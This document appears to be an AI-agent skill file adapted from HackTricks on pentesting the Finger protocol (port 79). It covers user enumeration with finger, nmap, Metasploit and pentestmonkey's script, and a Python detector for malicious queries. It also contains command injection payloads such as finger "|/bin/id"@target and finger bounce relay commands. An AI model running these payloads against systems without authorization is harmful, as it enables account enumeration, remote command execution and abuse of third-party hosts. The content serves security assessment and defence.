Hacktricks-skills finger-pentest

How to enumerate and exploit the Finger protocol (port 79) during security assessments. Use this skill whenever you need to enumerate users on a target system, check for finger service vulnerabilities, perform banner grabbing on port 79, or test for command injection and finger bounce attacks. Trigger this skill when the user mentions finger protocol, port 79, user enumeration, or needs to assess finger service security.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/pentesting-finger/SKILL.MD

Finger Protocol Pentesting

A skill for enumerating and exploiting the Finger protocol (TCP port 79) during security assessments.

When to Use This Skill

Use this skill when:

  • You need to enumerate users on a target system via the Finger protocol
  • Port 79 is open on a target during reconnaissance
  • You're performing user enumeration as part of an assessment
  • You need to test for finger protocol vulnerabilities (command injection, bounce attacks)
  • You want to gather information about user accounts on a remote system

Basic Information

The Finger protocol (RFC 1288) is a legacy service used to retrieve information about users on a system. It typically reveals:

  • Login names and full names
  • Office location and phone numbers
  • Login time and idle time
  • Last mail read time
  • Contents of plan and project files

Default port: 79/tcp

Enumeration Techniques

1. Banner Grabbing and Basic Connection

Start with a simple connection to verify the service is running:

# Basic connection to port 79
nc -vn <target-ip> 79

# Send a username to query
nc -vn <target-ip> 79 <<< "root"

2. User Enumeration

Query the finger service to list available users:

# List all users on the target
finger @<target-ip>

# Get information about a specific user
finger admin@<target-ip>
finger user@<target-ip>

3. Automated User Enumeration

Use finger-user-enum.pl (from pentestmonkey) for batch enumeration:

# Enumerate users from a wordlist
finger-user-enum.pl -U /path/to/users.txt -t <target-ip>

# Check a specific user
finger-user-enum.pl -u root -t <target-ip>

# Enumerate multiple targets
finger-user-enum.pl -U /path/to/users.txt -T /path/to/ips.txt

4. Nmap Scripts

Use Nmap's built-in finger NSE script:

# Service and version detection on port 79
nmap -sV -p 79 <target-ip>

# Run the finger NSE script (the stock Nmap script is named "finger")
nmap --script finger <target-ip>

5. Metasploit

Metasploit provides auxiliary modules for finger enumeration:

msfconsole
use auxiliary/scanner/finger/finger_users
set RHOSTS <target-ip>
run

6. Shodan Search

Search for finger services on the internet:

port:79
port:79 "USER"

Exploitation Techniques

Command Injection

Some finger implementations are vulnerable to command injection:

# Attempt to execute /bin/id
finger "|/bin/id"@<target-ip>

# Attempt to list files
finger "|/bin/ls -a /"@<target-ip>

Finger Bounce Attack

Use a compromised system as a relay to access internal networks:

# Bounce through an external system to reach internal targets
finger user@internal-host@external-relay

# Bounce from internal to external
finger @internal-system@external-system
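
Seen from the daemon side, both techniques above show up in the single request line the client sends: the injection attempt arrives as a username containing shell metacharacters, and the bounce arrives as a query that still contains @host. The following is an added example, not part of the original skill, that classifies captured request lines so they can be refused or alerted on; the function names, the username character set, the default policy and the sample lines are assumptions constructed for illustration.

```python
import re

# Assumption: local account names fit this conservative character set.
USERNAME = re.compile(r"[A-Za-z0-9._-]{1,32}")
HOSTNAME = re.compile(r"[A-Za-z0-9.-]{1,253}")

def classify_finger_query(raw: bytes) -> str:
    """Classify one request line as received on port 79: list/user/forward/reject."""
    try:
        line = raw.decode("ascii").rstrip("\r\n")
    except UnicodeDecodeError:
        return "reject"
    # RFC 1288 allows an optional "/W" (verbose) token before the query.
    if line == "/W" or line.startswith("/W "):
        line = line[2:].lstrip(" ")
    user, at, hosts = line.partition("@")
    # Refuse anything outside the username set (|, /, ;, spaces, embedded CR/LF).
    if user and not USERNAME.fullmatch(user):
        return "reject"
    if at:
        # "user@host" or "@host1@host2": the client asks this host to relay.
        ok = all(HOSTNAME.fullmatch(h) for h in hosts.split("@"))
        return "forward" if ok else "reject"
    return "user" if user else "list"

def should_serve(raw: bytes, allow_listing=False, allow_forwarding=False) -> bool:
    """Hypothetical daemon policy: forwarding and bare listings are off by default."""
    kind = classify_finger_query(raw)
    return (kind == "user" or (kind == "list" and allow_listing)
            or (kind == "forward" and allow_forwarding))

def triage(events):
    """Return (source, kind, line) for every request worth an alert."""
    return [(src, classify_finger_query(raw), raw)
            for src, raw in events
            if classify_finger_query(raw) in ("forward", "reject")]

# Constructed sample capture: request lines matching the commands on this page.
SAMPLE = [
    ("198.51.100.7", b"\r\n"),                    # finger @host
    ("198.51.100.7", b"/W admin\r\n"),            # verbose query for admin
    ("198.51.100.7", b"|/bin/id\r\n"),            # injection attempt
    ("198.51.100.7", b"user@internal-host\r\n"),  # bounce through this host
    ("198.51.100.7", b"@internal-system\r\n"),    # bounce, user listing
]

if __name__ == "__main__":
    for src, kind, raw in triage(SAMPLE):
        print(f"ALERT {src} {kind} {raw!r}")
```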

Workflow

  1. Reconnaissance: Identify if port 79 is open on the target
  2. Banner Grabbing: Connect to port 79 to verify the service is running
  3. User Enumeration: Query for user information using various techniques
  4. Vulnerability Testing: Test for command injection and bounce vulnerabilities
  5. Documentation: Record all findings for the assessment report

Example Session

# Step 1: Check if port 79 is open
nmap -p 79 192.168.1.100

# Step 2: Banner grab
nc -vn 192.168.1.100 79

# Step 3: Enumerate users
finger @192.168.1.100

# Step 4: Query specific users
for user in root admin test; do
    echo "=== $user ==="
    # Quote the argument so the username is passed as a single word
    finger "$user@192.168.1.100"
done

# Step 5: Test for vulnerabilities
finger "|/bin/id"@192.168.1.100

Notes

  • The Finger protocol is largely deprecated and rarely found on modern systems
  • Many systems block port 79 at the firewall level
  • Always have proper authorization before testing finger services
  • Document all findings as they may reveal valid usernames for further testing
  • Be aware that some finger implementations may log queries
